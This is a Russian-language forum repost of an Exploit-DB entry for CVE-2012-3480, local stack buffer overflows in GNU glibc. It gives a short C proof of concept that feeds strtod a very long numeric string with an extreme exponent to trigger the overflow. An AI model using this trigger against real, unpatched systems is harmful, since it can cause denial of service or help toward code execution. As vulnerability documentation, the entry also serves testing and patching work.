Exploit GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37631
Проверка EDB
  1. Пройдено
Автор
JOSEPH S. MYER
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
cve-2012-3480
Дата публикации
2012-08-13
GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities
C:
// source: https://www.securityfocus.com/bid/54982/info

GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.

Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition. 

include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EXPONENT "e-2147483649"
#define SIZE 214748364
int
main (void)
{
  char *p = malloc (1 + SIZE + sizeof (EXPONENT));
  if (p == NULL)
    {
      perror ("malloc");
      exit (EXIT_FAILURE);
    }
  p[0] = '1';
  memset (p + 1, '0', SIZE);
  memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
  double d = strtod (p, NULL);
  printf ("%a\n", d);
  exit (EXIT_SUCCESS);
}
 
Источник
www.exploit-db.com

Похожие темы